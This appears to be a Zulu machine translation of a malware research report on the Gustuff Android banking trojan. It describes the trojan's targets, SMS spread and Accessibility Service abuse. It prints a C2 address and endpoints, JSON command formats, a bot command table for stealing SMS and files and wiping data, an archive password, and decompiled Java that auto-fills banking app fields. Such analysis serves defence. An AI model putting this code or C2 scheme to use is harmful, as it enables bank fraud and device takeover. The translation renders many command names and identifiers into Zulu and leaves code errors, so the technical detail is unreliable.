Ngolunye usuku Group-IB mayelana nomsebenzi weselula ye-Android Trojan Gustuff. Isebenza kuphela ezimakethe zomhlaba wonke, ihlasela amakhasimende amabhange amakhulu angaphandle ayi-100, abasebenzisi bezikhwama zeselula ze-crypto 32, kanye nezinsiza ezinkulu ze-e-commerce. Kodwa umthuthukisi we-Gustuff uyisigebengu se-inthanethi esikhuluma isiRashiya ngaphansi kwesidlaliso esithi Bestoffer. Kuze kube muva nje, uncome iTrojan yakhe “njengomkhiqizo obalulekile wabantu abanolwazi nesipiliyoni.”
Uchwepheshe wokuhlaziya amakhodi anonya kwa-Group-IB U-Ivan Pisarev ocwaningweni lwakhe, ukhuluma ngokuningiliziwe ngendlela uGustuff asebenza ngayo nokuthi ziyini izingozi zayo.
UGustuff uzingela bani?
I-Gustuff ingeyesizukulwane esisha sohlelo olungayilungele ikhompuyutha esinemisebenzi ezenzakalelayo ngokugcwele. Ngokusho komthuthukisi, iTrojan isiphenduke inguqulo entsha nethuthukisiwe yohlelo olungayilungele ikhompuyutha lwe-AndyBot, okuthe kusukela ngoNovemba 2017 ibihlasela amafoni e-Android futhi yeba imali ngokusebenzisa amafomu ewebhu obugebengu azenza izinhlelo zokusebenza zeselula zamabhange aziwayo omhlaba nezinhlelo zokukhokha. U-Bestoffer ubike ukuthi intengo yokuqasha i-Gustuff Bot ibingu-$800 ngenyanga.
Ukuhlaziywa kwesampula ye-Gustuff kubonise ukuthi iTrojan ingase iqondise amakhasimende esebenzisa izinhlelo zokusebenza zamabhange amakhulu kunawo wonke, njenge-Bank of America, Bank of Scotland, JPMorgan, Wells Fargo, Capital One, TD Bank, PNC Bank, kanye nezikhwama ze-crypto. I-Bitcoin Wallet, i-BitPay, i-Cryptopay, i-Coinbase, njll.
Idalwe ekuqaleni njenge-Trojan yasebhange yakudala, enguqulweni yamanje i-Gustuff ilukhulise ngokuphawulekayo uhlu lwezinjongo ezingase zibe khona zokuhlaselwa. Ngaphezu kwezicelo ze-Android zamabhange, izinkampani ze-fintech nezinsizakalo ze-crypto, i-Gustuff ihloselwe abasebenzisi bezicelo zemakethe, izitolo ze-inthanethi, izinhlelo zokukhokha nezithunywa ezisheshayo. Ikakhulukazi, PayPal, Western Union, eBay, Walmart, Skype, WhatsApp, Gett Taxi, Revolut nabanye.
Iphuzu lokungena: ukubalwa kokutheleleka ngobuningi
I-Gustuff ibonakala ngevekhtha “yakudala” yokungena kuma-smartphone e-Android ngokuthumela ama-SMS anezixhumanisi zama-APK. Uma idivayisi ye-Android itheleleke nge-Trojan ngokuyalelwa yiseva, i-Gustuff ingase iqhubeke isabalalisa ngesizindalwazi soxhumana nabo sefoni ethelelekile noma ngesizindalwazi seseva. Ukusebenza kukaGustuff kuklanyelwe ukutheleleka ngobuningi kanye nenani elikhulu lemali yebhizinisi labaqhubi balo - linomsebenzi oyingqayizivele "wokulayisha ngokuzenzakalela" kuzinhlelo zokusebenza zebhange zeselula ezisemthethweni kanye nezikhwama ze-crypto, ezikuvumela ukuthi usheshise futhi ulinganise ukwebiwa kwemali.
Ucwaningo lweTrojan lubonise ukuthi umsebenzi wokugcwalisa ngokuzenzakalelayo wasetshenziswa kuyo kusetshenziswa Isevisi Yokufinyelela, isevisi yabantu abakhubazekile. I-Gustuff akuyona i-Trojan yokuqala ukweqa ngempumelelo isivikelo ekusebenzisaneni nezinto zewindi zezinye izinhlelo zokusebenza zisebenzisa le sevisi ye-Android. Noma kunjalo, ukusetshenziswa kwe-Accessibility Service ngokuhlanganiswa nesigcwalisi semoto kuseyivelakancane.
Ngemva kokulanda ocingweni lwesisulu, uGustuff, esebenzisa i-Accessibility Service, uyakwazi ukusebenzisana nezinto zefasitela zezinye izinhlelo zokusebenza (ibhange, i-cryptocurrency, kanye nezicelo zokuthenga ku-inthanethi, ukuthumela imiyalezo, njll.), enze izenzo ezidingekayo kubahlaseli. . Isibonelo, ngomyalo weseva, iTrojan ingacindezela izinkinobho futhi iguqule amanani ezinkambu zombhalo ezinhlelweni zokusebenza zebhange. Ukusebenzisa indlela Yesevisi Yokufinyeleleka kuvumela i-Trojan ukuthi yeqe izindlela zokuphepha ezisetshenziswa amabhange ukuze imelane nama-Trojan eselula esizukulwane sangaphambilini, kanye nezinguquko kunqubomgomo yokuphepha esetshenziswe i-Google ezinguqulweni ezintsha ze-Android OS. Ngakho, u-Gustuff "uyazi" ukukhubaza ukuvikelwa kwe-Google Protect: ngokusho komlobi, lo msebenzi usebenza ku-70% yamacala.
I-Gustuff ingaphinda ibonise izaziso zomgunyathi ze-PUSH ezinezithonjana zezinhlelo zokusebenza zeselula ezisemthethweni. Umsebenzisi uchofoza isaziso se-PUSH futhi abone iwindi lobugebengu bokweba imininingwane ebucayi elilandwe kuseva, lapho efaka khona ikhadi lebhange eliceliwe noma idatha ye-crypto wallet. Kwesinye isimo se-Gustuff, isicelo esivezwe egameni laso isaziso se-PUSH siyavulwa. Kulokhu, uhlelo olungayilungele ikhompuyutha, uma umyalo ovela kuseva usebenzisa Isevisi Yokufinyeleleka, ungagcwalisa izinkambu zefomu lesicelo sasebhange ngomsebenzi womgunyathi.
Ukusebenza kukaGustuff kuhlanganisa nokuthumela imininingwane ngedivayisi enegciwane kuseva, ikhono lokufunda/ukuthumela imilayezo ye-SMS, ukuthumela izicelo ze-USSD, ukwethula i-SOCKS5 Proxy, ukulandela isixhumanisi, ukuthumela amafayela (okuhlanganisa nokuskenwa kwezithombe kwemibhalo, izithombe-skrini, izithombe) ku iseva , setha kabusha idivayisi ibe izilungiselelo zasembonini.
Ukuhlaziya uhlelo olungayilungele ikhompuyutha
Ngaphambi kokufaka uhlelo olunonya, i-Android OS ibonisa umsebenzisi iwindi eliqukethe uhlu lwamalungelo acelwe u-Gustuff:
Uhlelo lokusebenza luzofakwa kuphela ngemuva kokuthola imvume yomsebenzisi. Ngemuva kokwethula uhlelo, iThrojani izokhombisa umsebenzisi iwindi:
Ngemuva kwalokho izosusa isithonjana sayo.
I-Gustuff igcwele, ngokusho kombhali, yi-packer evela ku-FTT. Ngemva kokuqalisa, uhlelo lokusebenza luxhumana neseva ye-CnC ngezikhathi ezithile ukuze lwamukele imiyalo. Amafayela amaningana esiwahlolile asebenzise ikheli le-IP njengeseva yokulawula 88.99.171[.]105 (ngemuva kwalokhu sizoyichaza ngokuthi <%CnC%>).
Ngemva kokwethulwa, uhlelo luqala ukuthumela imilayezo kuseva http://<%CnC%>/api/v1/get.php.
Impendulo ilindeleke ukuthi ibe yi-JSON ngale fomethi elandelayo:
{
"results" : "OK",
"command":{
"id": "<%id%>",
"command":"<%command%>",
"timestamp":"<%Server Timestamp%>",
"params":{
<%Command parameters as JSON%>
},
},
}Ngaso sonke isikhathi uma uhlelo lokusebenza lufinyelelwa, luthumela ulwazi mayelana nedivayisi ethelelekile. Ifomethi yomlayezo ikhonjiswe ngezansi. Kuyaphawuleka ukuthi amasimu ngokugcwele, extra, Izinhlelo zokusebenza и imvume - ngokuzithandela futhi izothunyelwa kuphela uma kunesicelo somyalo ovela kwa-CnC.
{
"info":
{
"info":
{
"cell":<%Sim operator name%>,
"country":<%Country ISO%>,
"imei":<%IMEI%>,
"number":<%Phone number%>,
"line1Number":<%Phone number%>,
"advertisementId":<%ID%>
},
"state":
{
"admin":<%Has admin rights%>,
"source":<%String%>,
"needPermissions":<%Application needs permissions%>,
"accesByName":<%Boolean%>,
"accesByService":<%Boolean%>,
"safetyNet":<%String%>,
"defaultSmsApp":<%Default Sms Application%>,
"isDefaultSmsApp":<%Current application is Default Sms Application%>,
"dateTime":<%Current date time%>,
"batteryLevel":<%Battery level%>
},
"socks":
{
"id":<%Proxy module ID%>,
"enabled":<%Is enabled%>,
"active":<%Is active%>
},
"version":
{
"versionName":<%Package Version Name%>,
"versionCode":<%Package Version Code%>,
"lastUpdateTime":<%Package Last Update Time%>,
"tag":<%Tag, default value: "TAG"%>,
"targetSdkVersion":<%Target Sdk Version%>,
"buildConfigTimestamp":1541309066721
},
},
"full":
{
"model":<%Device Model%>,
"localeCountry":<%Country%>,
"localeLang":<%Locale language%>,
"accounts":<%JSON array, contains from "name" and "type" of accounts%>,
"lockType":<%Type of lockscreen password%>
},
"extra":
{
"serial":<%Build serial number%>,
"board":<%Build Board%>,
"brand":<%Build Brand%>,
"user":<%Build User%>,
"device":<%Build Device%>,
"display":<%Build Display%>,
"id":<%Build ID%>,
"manufacturer":<%Build manufacturer%>,
"model":<%Build model%>,
"product":<%Build product%>,
"tags":<%Build tags%>,
"type":<%Build type%>,
"imei":<%imei%>,
"imsi":<%imsi%>,
"line1number":<%phonenumber%>,
"iccid":<%Sim serial number%>,
"mcc":<%Mobile country code of operator%>,
"mnc":<%Mobile network codeof operator%>,
"cellid":<%GSM-data%>,
"lac":<%GSM-data%>,
"androidid":<%Android Id%>,
"ssid":<%Wi-Fi SSID%>
},
"apps":{<%List of installed applications%>},
"permission":<%List of granted permissions%>
} Ukugcina idatha yokumisa
I-Gustuff igcina ulwazi olubalulekile ekusebenzeni kwefayela elithandwayo. Igama lefayela, kanye namagama amapharamitha akulo, kuwumphumela wokubala isamba se-MD5 ocingweni. 15413090667214.6.1<%name%>kuphi <%name%> - inani legama lokuqala. Incazelo yePython yomsebenzi wokukhiqiza igama:
nameGenerator(input):
output = md5("15413090667214.6.1" + input)
Kulokhu okulandelayo sizokuchaza ngokuthi IgamaGenerator(okufakiwe).
Ngakho igama lefayela lokuqala lithi: nameGenerator("API_SERVER_LIST"), iqukethe amanani anamagama alandelayo:
| Igama eliguquguqukayo | Okushoyo |
|---|---|
| nameGenerator("API_SERVER_LIST") | Iqukethe uhlu lwamakheli e-CnC ngendlela yamalungu afanayo. |
| nameGenerator("API_SERVER_URL") | Iqukethe ikheli le-CnC. |
| IgamaJeneretha("SMS_UPLOAD") | Ifulegi lisethwa ngokuzenzakalelayo. Uma ifulegi lisethiwe, ithumela imilayezo ye-SMS ku-CnC. |
| IgamaGenerator("SMS_ROOT_NUMBER") | Inombolo yefoni okuzothunyelwa kuyo imilayezo ye-SMS etholwe idivayisi ethelelekile. Okuzenzakalelayo akukho. |
| IgamaGenerator("SMS_ROOT_NUMBER_RESEND") | Ifulegi lisulwa ngokuzenzakalela. Uma ifakiwe, lapho idivayisi enegciwane ithola i-SMS, izothunyelwa enombolweni yempande. |
| IgamaGenerator("DEFAULT_APP_SMS") | Ifulegi lisulwa ngokuzenzakalela. Uma leli fulegi lisethiwe, uhlelo lokusebenza luzocubungula imilayezo ye-SMS engenayo. |
| nameGenerator("DEFAULT_ADMIN") | Ifulegi lisulwa ngokuzenzakalela. Uma ifulegi lisethiwe, uhlelo lokusebenza lunamalungelo omlawuli. |
| nameGenerator("DEFAULT_ACCESSIBILITY") | Ifulegi lisulwa ngokuzenzakalela. Uma ifulegi lisethiwe, isevisi esebenzisa Isevisi Yokufinyeleleka iyasebenza. |
| IgamaGenerator("APPS_CONFIG") | Into ye-JSON equkethe uhlu lwezenzo okufanele zenziwe uma umcimbi wokufinyelela ohlotshaniswa nohlelo lokusebenza oluthile uqaliswa. |
| IgamaGenerator("APPS_INSTALLED") | Igcina uhlu lwezinhlelo zokusebenza ezifakwe kudivayisi. |
| IgamaJeneretha("IS_FIST_RUN") | Ifulegi lisethwa kabusha ekuqaleni kokuqala. |
| IgamaGenerator("UNIQUE_ID") | Iqukethe isihlonzi esiyingqayizivele. Ikhiqizwa lapho i-bot yethulwa okokuqala ngqa. |
Imojula yokucubungula imiyalo evela kuseva
Uhlelo lokusebenza lugcina amakheli eziphakeli ze-CnC ngendlela yamalungu afanayo abhalwe ngekhodi Isisekelo85 imigqa. Uhlu lwamaseva e-CnC lungashintshwa lapho kutholwa umyalo ofanele, lapho amakheli azogcinwa kufayela elithandwayo.
Ngokuphendula isicelo, iseva ithumela umyalo kuhlelo lokusebenza. Kuyaqapheleka ukuthi imiyalo namapharamitha ethulwa ngefomethi ye-JSON. Uhlelo lokusebenza lungacubungula imiyalo elandelayo:
| Ithimba | Incazelo |
|---|---|
| phambiliQala | Qala ukuthumela imilayezo ye-SMS etholwe idivayisi ethelelekile kuseva ye-CnC. |
| phambiliMisa | Misa ukuthumela imilayezo ye-SMS etholwe idivayisi ethelelekile kuseva ye-CnC. |
| ussdRun | Faka isicelo se-USSD. Inombolo odinga ukufaka kuyo isicelo se-USSD itholakala endaweni ye-JSON “inombolo”. |
| thumela ama-SMS | Thumela umlayezo we-SMS owodwa (uma kunesidingo, umlayezo "uhlukaniswa" ube izingxenye). Njengepharamitha, umyalo uthatha into ye-JSON equkethe izinkambu “kuya” - inombolo yendawo kanye “nomzimba” - indikimba yomlayezo. |
| Thumela i-SmsAb | Thumela imilayezo ye-SMS (uma kunesidingo, umlayezo "uhlukaniswa" ube izingxenye) kuwo wonke umuntu ohlwini lwabathintwayo lwedivayisi ethelelekile. Isikhawu phakathi kokuthumela imiyalezo yimizuzwana eyi-10. Umzimba womlayezo usenkambu ye-JSON "umzimba" |
| thumela i-SmsMass | Thumela imilayezo ye-SMS (uma kunesidingo, umlayezo "uhlukaniswa" ube izingxenye) koxhumana nabo abashiwo kumapharamitha womyalo. Isikhawu phakathi kokuthumela imiyalezo yimizuzwana eyi-10. Njengepharamitha, umyalo uthatha amalungu afanayo e-JSON (inkambu “ye-sms”), izici zayo eziqukethe izinkambu “kuya” - inombolo yendawo kanye “nomzimba” - indikimba yomlayezo. |
| shintshaServer | Lo myalo ungathatha inani ngokhiye othi “url” njengepharamitha - bese i-bot izoshintsha inani le-nameGenerator(“SERVER_URL”), noma “array” - bese i-bot izobhala amalungu afanayo ku-nameGenerator (“API_SERVER_LIST”) Ngakho, isicelo sishintsha ikheli lamaseva e-CnC. |
| adminNumber | Umyalo uklanyelwe ukusebenza nenombolo yempande. Umyalo wamukela into ye-JSON enamapharamitha alandelayo: “inombolo” — shintsha igamaGenerator(“ROOT_NUMBER”) libe inani elitholiwe, “thumela kabusha” — shintsha igamaGenerator(“SMS_ROOT_NUMBER_RESEND”), “sendId” — thumela ku-nameGenerator(“ROOT_NUMBER” ) uniqueID. |
| updateInfo | Thumela ulwazi mayelana nedivayisi enegciwane kuseva. |
| sulaData | Umyalo uhloselwe ukususa idatha yomsebenzisi. Kuye ngokuthi iliphi igama eliqaliswe uhlelo lokusebenza, kungenzeka ukuthi idatha isulwa ngokuphelele ngokuqalisa kabusha idivayisi (umsebenzisi oyinhloko), noma idatha yomsebenzisi kuphela esuswayo (umsebenzisi wesibili). |
| amasokisiQala | Yethula imojuli ye-Proxy. Ukusebenza kwemojula kuchazwe esigabeni esihlukile. |
| amasokisiStop | Misa imojuli yommeleli. |
| OpenLink | Landela isixhumanisi. Isixhumanisi sitholakala kupharamitha ye-JSON ngaphansi kokhiye othi “url”. I-“android.intent.action.VIEW” isetshenziswa ukuvula isixhumanisi. |
| uploadAllSms | Thumela yonke imilayezo ye-SMS etholwe idivayisi kuseva. |
| uploadAllPhotos | Thumela izithombe zisuka kudivayisi ethelelekile ziye ku-URL. I-URL iza njengepharamitha. |
| uploadFile | Thumela ifayela ku-URL kusuka kudivayisi ethelelekile. I-URL iza njengepharamitha. |
| layishaIzinombolo Zocingo | Thumela izinombolo zocingo kusuka ohlwini lwakho loxhumana nabo kuseva. Uma inani lento ye-JSON elinokhiye othi “ab” lamukelwe njengepharamitha, uhlelo lokusebenza luthola uhlu loxhumana nabo encwadini yocingo. Uma into ye-JSON enokhiye othi “sms” itholwa njengepharamitha, uhlelo lokusebenza lufunda uhlu loxhumana nabo oluvela kubathumeli bemilayezo ye-SMS. |
| shintshaIngobo yomlando | Uhlelo lokusebenza ludawuniloda ifayela ekhelini eliza njengepharamitha lisebenzisa ukhiye othi “url”. Ifayela elilandiwe lilondolozwe ngegama elithi “archive.zip”. Uhlelo lokusebenza luzobese luvula ifayela, ngokukhetha kusetshenziswa iphasiwedi yengobo yomlando “b5jXh37gxgHBrZhQ4j3D”. Amafayela angavaliwe alondolozwe kuhla lwemibhalo [isitoreji sangaphandle]/hgps. Kulolu hlu lwemibhalo, uhlelo lokusebenza lugcina amanga ewebhu (okuchazwe ngezansi). |
| izenzo | Umyalo uklanyelwe ukusebenza ne-Action Service, echazwe esigabeni esihlukile. |
| test | Ungenzi lutho. |
| thwebula | Umyalo uhloselwe ukulanda ifayela kuseva ekude futhi ulilondoloze ohlwini lwemibhalo "Okulandiwe". I-URL negama lefayela kuza njengepharamitha, izinkambu entweni yepharamitha ye-JSON, ngokulandelanayo: “url” kanye “negama lefayela”. |
| ukususa | Ikhipha ifayela ohlwini lwemibhalo "Okulandiwe". Igama lefayela liza ngepharamitha ye-JSON ngokhiye othi “fileName”. Igama lefayela elijwayelekile lithi “tmp.apk”. |
| isaziso | Bonisa isaziso esinencazelo nemibhalo yesihloko echazwe iseva yokuphatha. |
Ifomethi ye-Command isaziso:
{
"results" : "OK",
"command":{
"id": <%id%>,
"command":"notification",
"timestamp":<%Server Timestamp%>,
"params":{
"openApp":<%Open original app or not%>,
"array":[
{"title":<%Title text%>,
"desc":<%Description text%>,
"app":<%Application name%>}
]
},
},
}Isaziso esikhiqizwe ifayela eliphenywayo sibukeka sifana nezaziso ezikhiqizwe uhlelo lokusebenza olucaciswe endimeni. uhlelo lokusebenza. Uma inani lenkambu OpenApp - Yiqiniso, lapho isaziso sivulwa, uhlelo lokusebenza olubalulwe ensimini luqaliswa uhlelo lokusebenza. Uma inani lenkambu OpenApp - Amanga, ke:
- Kuvulwa iwindi lobugebengu bokweba imininingwane ebucayi, okuqukethwe kwakho kulandwa ohlwini lwemibhalo <%isitoreji sangaphandle%>/hgps/<%filename%>
- Iwindi lobugebengu bokweba imininingwane ebucayi liyavuleka, okuqukethwe kwakho kulandwa kuseva <%url%>?id=<%Bot id%>&app=<%Igama lesicelo%>
- Iwindi lobugebengu bokweba imininingwane ebucayi liyavuleka, elifihlwe njengekhadi le-Google Play, elinethuba lokufaka imininingwane yekhadi.
Uhlelo lokusebenza luthumela umphumela wanoma yimuphi umyalo ku <%CnC%>set_state.php njengento ye-JSON ngefomethi elandelayo:
{
"command":
{
"command":<%command%>,
"id":<%command_id%>,
"state":<%command_state%>
}
"id":<%bot_id%>
}
ActionsService
Uhlu lwemiyalo olubandakanya izinqubo zohlelo lokusebenza isenzo. Lapho umyalo wamukelwa, imojula yokucubungula umyalo ifinyelela le sevisi ukuze ikhiphe umyalo owandisiwe. Isevisi yamukela into ye-JSON njengepharamitha. Isevisi ingenza imiyalo elandelayo:
1. PARAMS_ACTION - lapho ithola umyalo onjalo, isevisi iqala ukuthola kupharamitha ye-JSON inani lokhiye Wohlobo, okungaba ngale ndlela elandelayo:
- serviceInfo - i-subcommand ithola inani ngokhiye kusuka kupharamitha ye-JSON zihlanganisaAkubalulekile. Uma ifulegi liyiqiniso, uhlelo lokusebenza lusetha ifulegi FLAG_ISOLATED_PROCESS kusevisi esebenzisa Isevisi Yokufinyeleleka. Ngale ndlela isevisi izokwethulwa ngenqubo ehlukile.
- izimpande — thola bese uthumela kuseva ulwazi mayelana newindi okugxilwe kulo njengamanje. Uhlelo lokusebenza luthola ulwazi lisebenzisa isigaba se-AccessibilityNodeInfo.
- admin - cela amalungelo omphathi.
- ukubambezeleka — misa i-ActionsService ngenani lama-millisecond ashiwo kupharamitha yokhiye “wedatha”.
- windows — thumela uhlu lwamawindi abonakala kumsebenzisi.
- Faka — faka uhlelo ocingweni olunegciwane. Igama lephakheji yengobo yomlando likukhiye othi “fileName”. Ingobo yomlando ngokwayo itholakala kuhla lwemibhalo Lokulandiwe.
- global - i-subcommand ihloselwe ukuzulazula efasiteleni lamanje:
- kumenyu Yezilungiselelo Ezisheshayo
- emuva
- ekhaya
- kuzaziso
- kuwindi lezinhlelo zokusebenza ezisanda kuvulwa
- Uqalise - qala uhlelo lokusebenza. Igama lohlelo lokusebenza liza njengepharamitha ngokhiye idatha.
- umsindo — shintsha imodi yomsindo ithule.
- vula — ikhanyisa i-backlight yesikrini nekhibhodi ekukhanyeni okugcwele. Uhlelo lokusebenza lwenza lesi senzo lisebenzisa i-WakeLock, lucacisa uchungechunge [Ilebula lesicelo]:INFO njengethegi.
- imvumeImbondela — umsebenzi awenziwanga (impendulo yokwenziwa komyalo ithi {"umlayezo":"Awusekeli"} noma {"umlayezo":"low sdk"})
- isenzo — umsebenzi awenziwanga (impendulo yokwenziwa komyalo ithi {"umlayezo":"Awusekeli"}noma {"umlayezo":"I-API Ephansi"})
- izimvume - lo myalo uyadingeka ukuze ucele izimvume zohlelo lokusebenza. Kodwa-ke, umsebenzi wombuzo awenziwanga, ngakho-ke umyalo awusho lutho. Uhlu lwamalungelo aceliwe luza njengohlelo lwe-JSON olunokhiye othi "izimvume". Uhlu olujwayelekile:
- android.permission.READ_PHONE_STATE
- android.permission.READ_CONTACTS
- android.permission.CALL_PHONE
- android.permission.RECEIVE_SMS
- android.permission.SEND_SMS
- android.permission.READ_SMS
- android.permission.READ_EXTERNAL_STORAGE
- android.permission.WRITE_EXTERNAL_STORAGE
- evulekile — veza iwindi lobugebengu bokweba imininingwane ebucayi. Ngokuya ngepharamitha evela kuseva, uhlelo lokusebenza lungabonisa amawindi obugebengu bokweba imininingwane ebucayi alandelayo:
- Bonisa iwindi lobugebengu bokweba imininingwane ebucayi okuqukethwe kwalo okubhalwe efayeleni kuhla lwemibhalo <% umkhombandlela wangaphandle%>/hgps/<%param_filename%>. Umphumela wokusebenzelana komsebenzisi newindi uzothunyelwa kuwo <%CnC%>/records.php
- Bonisa iwindi lobugebengu bokweba imininingwane ebucayi okuqukethwe kwalo kulayishwe kusengaphambili kusuka ekhelini <%url_param%>?id=<%bot_id%>&app=<%packagename%>. Umphumela wokusebenzelana komsebenzisi newindi uzothunyelwa kuwo <%CnC%>/records.php
- Bonisa iwindi lobugebengu bokweba imininingwane ebucayi elifihle njengekhadi le-Google Play.
- interactive — umyalo uklanyelwe ukusebenzisana nezinto zewindi zezinye izinhlelo zokusebenza kusetshenziswa i-AcessibilityService. Kusetshenziswe isevisi ekhethekile ohlelweni lokusebenzelana. Uhlelo lokusebenza oluphenywayo lungasebenzisana namawindi:
- Okwamanje iyasebenza. Kulesi simo, ipharamitha iqukethe i-id noma umbhalo (igama) wento okudingeka uhlanganyele nayo.
- Kubonakala kumsebenzisi ngesikhathi kukhishwa umyalo. Uhlelo lokusebenza lukhetha amawindi nge-id.
Ngemva kokuthola izinto AccessibilityNodeInfo Kuzinto ezithakaselwayo zewindi, uhlelo lokusebenza, kuye ngamapharamitha, lungenza lezi zenzo ezilandelayo:
- focus — setha ukugxila entweni.
- chofoza - chofoza entweni.
- actionId — yenza isenzo nge-ID.
- setText — shintsha umbhalo wento. Ukushintsha umbhalo kungenzeka ngezindlela ezimbili: yenza isenzo ACTION_SET_TEXT (uma inguqulo ye-Android yedivayisi enegciwane incane noma ilingana nayo LOLLIPOP), noma ngokubeka iyunithi yezinhlamvu ebhodini lokunamathisela bese uyinamathisela entweni (ngezinguqulo ezindala). Lo myalo ungasetshenziswa ukushintsha idatha kuhlelo lokusebenza lwasebhange.
2. PARMS_ACTIONS - okufanayo PARAMS_ACTION, kufika uxhaxha lwemiyalo ye-JSON kuphela.
Kubonakala sengathi abantu abaningi bazoba nentshisekelo yokuthi ubukeka kanjani umsebenzi wokusebenzelana nezinto zewindi zolunye uhlelo lokusebenza. Nansi indlela lokhu kusebenza okwenziwa ngayo e-Gustuff:
boolean interactiveAction(List aiList, JSONObject action, JsonObject res) {
int count = action.optInt("repeat", 1);
Iterator aiListIterator = ((Iterable)aiList).iterator();
int count = 0;
while(aiListIterator.hasNext()) {
Object ani = aiListIterator.next();
if(1 <= count) {
int index;
for(index = 1; true; ++index) {
if(action.has("focus")) {
if(((AccessibilityNodeInfo)ani).performAction(1)) {
++count;
}
}
else if(action.has("click")) {
if(((AccessibilityNodeInfo)ani).performAction(16)) {
++count;
}
}
else if(action.has("actionId")) {
if(((AccessibilityNodeInfo)ani).performAction(action.optInt("actionId"))) {
++count;
}
}
else if(action.has("setText")) {
customHeader ch = CustomAccessibilityService.a;
Context context = this.getApplicationContext();
String text = action.optString("setText");
if(performSetTextAction(ch, context, ((AccessibilityNodeInfo)ani), text)) {
++count;
}
}
if(index == count) {
break;
}
}
}
((AccessibilityNodeInfo)ani).recycle();
}
res.addPropertyNumber("res", Integer.valueOf(count));
}Umsebenzi wokushintsha umbhalo:
boolean performSetTextAction(Context context, AccessibilityNodeInfo ani, String text) {
boolean result;
if(Build$VERSION.SDK_INT >= 21) {
Bundle b = new Bundle();
b.putCharSequence("ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE", ((CharSequence)text));
result = ani.performAction(0x200000, b); // ACTION_SET_TEXT
}
else {
Object clipboard = context.getSystemService("clipboard");
if(clipboard != null) {
((ClipboardManager)clipboard).setPrimaryClip(ClipData.newPlainText("autofill_pm", ((CharSequence)text)));
result = ani.performAction(0x8000); // ACTION_PASTE
}
else {
result = false;
}
}
return result;
}Ngakho, ngokucushwa okulungile kweseva yokulawula, i-Gustuff iyakwazi ukugcwalisa izinkambu zombhalo kuhlelo lokusebenza lwasebhange bese uchofoza izinkinobho ezidingekayo ukuze uqedele ukuthengiselana. I-Trojan ayidingi ngisho nokungena kuhlelo lokusebenza-kwanele ukuthumela umyalo wokubonisa isaziso se-PUSH bese uvula uhlelo lokusebenza lwebhange olufakwe ngaphambilini. Umsebenzisi uzozifakazela ubuqiniso, emva kwalokho uGustuff uzokwazi ukugcwalisa imoto.
Imojula yokucubungula umlayezo we-SMS
Uhlelo lokusebenza lufaka isibambi somcimbi ukuze idivayisi ethelelekile yamukele imilayezo ye-SMS. Isicelo esingaphansi kocwaningo singathola imiyalo evela ku-opharetha, efika emzimbeni womlayezo we-SMS. Imiyalo iza ngefomethi:
7!5=<%Base64 umyalo ofakwe ikhodi%>
Uhlelo lokusebenza lucinga iyunithi yezinhlamvu kuyo yonke imilayezo ye-SMS engenayo 7!5=, lapho iyunithi yezinhlamvu itholwa, ikhipha ikhodi ku-Base64 ku-offset 4 bese ikhipha umyalo. Imiyalo iyafana naleyo ene-CnC. Umphumela wokwenza uthunyelwa enombolweni efanayo lapho ovela khona umyalo. Ifomethi yempendulo:
7*5=<%Base64 encode of “result_code command”%>
Ngokuzithandela, uhlelo lokusebenza lungathumela yonke imilayezo etholiwe enombolweni ye-Root. Ukuze wenze lokhu, inombolo ye-Root kufanele icaciswe efayeleni elithandwayo futhi ifulegi lokuqondisa kabusha umlayezo kufanele lisethwe. Umlayezo we-SMS uthunyelwa enombolweni yomhlaseli ngefomethi:
<%Kusukela kunombolo%> - <%Isikhathi, ifomethi: dd/MM/yyyy HH:mm:ss%> <%SMS body%>
Futhi, ngokuzikhethela, uhlelo lokusebenza lungathumela imilayezo ku-CnC. Umlayezo we-SMS uthunyelwa kuseva ngefomethi ye-JSON:
{
"id":<%BotID%>,
"sms":
{
"text":<%SMS body%>,
"number":<%From number%>,
"date":<%Timestamp%>
}
}Uma ifulegi lisethiwe IgamaGenerator("DEFAULT_APP_SMS") - uhlelo lokusebenza luyayeka ukucubungula umlayezo we-SMS futhi lusule uhlu lwemilayezo engenayo.
Imojula yommeleli
Uhlelo lokusebenza olusacwaningwayo luqukethe imojula ye-Backconnect Proxy (ngemuva kwalokhu ebizwa ngokuthi imojula yommeleli), eneklasi elihlukile elihlanganisa izinkambu ezimile ezinokucushwa. Idatha yokumisa igcinwa kusampula ngendlela ecacile:
Zonke izenzo ezenziwa imojula yommeleli zifakwe kumafayela. Ukwenza lokhu, uhlelo lokusebenza Kusitoreji Sangaphandle ludala uhla lwemibhalo olubizwa ngokuthi “amalogi” (inkambu ye-ProxyConfigClass.logsDir esigabeni sokucushwa), lapho kugcinwa khona amafayela okungena. Ukungena ngemvume kwenzeka kumafayela anamagama:
- main.txt - umsebenzi wekilasi obizwa nge-CommandServer ungene kuleli fayela. Ngokulandelayo, ukungena kweyunithi yezinhlamvu kuleli fayela kuzochazwa ngokuthi mainLog(str).
- iseshini-<%id%>.txt — leli fayela ligcina idatha yelogi ehlotshaniswa neseshini ethile yommeleli. Ngokulandelayo, ukungena kweyunithi yezinhlamvu kuleli fayela kuzochazwa ngokuthi iseshiniLog (str).
- iseva.txt - leli fayela lisetshenziselwa ukungena kuyo yonke idatha ebhalwe kumafayela achazwe ngenhla.
Ifomethi yedatha yelogi:
<%Date%> [Uchungechunge[<%thread id%>], id[]]: log-string
Okuhlukile okwenzeka ngesikhathi sokusebenza kwemojuli yommeleli nakho kufakwe efayeleni. Ukwenza lokhu, uhlelo lokusebenza lukhiqiza into ye-JSON ngefomethi elandelayo:
{
"uncaughtException":<%short description of throwable%>
"thread":<%thread%>
"message":<%detail message of throwable%>
"trace": //Stack trace info
[
{
"ClassName":
"FileName":
"LineNumber":
"MethodName":
},
{
"ClassName":
"FileName":
"LineNumber":
"MethodName":
}
]
}Bese iyiguqulela efanekisweni yeyunithi yezinhlamvu futhi iyilogue.
Imojuli ye-Proxy yethulwa ngemva kokuthola umyalo ohambisanayo. Uma umyalo wokwethula imojuli ye-Proxy wamukelwe, uhlelo luqala isevisi ebizwa Isevisi Eyinhloko, enesibopho sokuphatha ukusebenza kwemojula ye-Proxy - ukuyiqala nokuyimisa.
Izigaba zokuqala isevisi:
1. Iqala isibali sikhathi esisebenza kanye ngomzuzu bese ihlola umsebenzi wemojula yommeleli. Uma imojuli ingasebenzi, iyayiqala.
Futhi lapho umcimbi ucushiwe android.net.conn.CONNECTIVITY_CHANGE Imojula yommeleli yethulwa.
2. Uhlelo lokusebenza ludala i-wake-lock ngepharamitha PARTIAL_WAKE_LOCK futhi ayibambe. Lokhu kuvimbela i-CPU yedivayisi ukuthi iye kumodi yokulala.
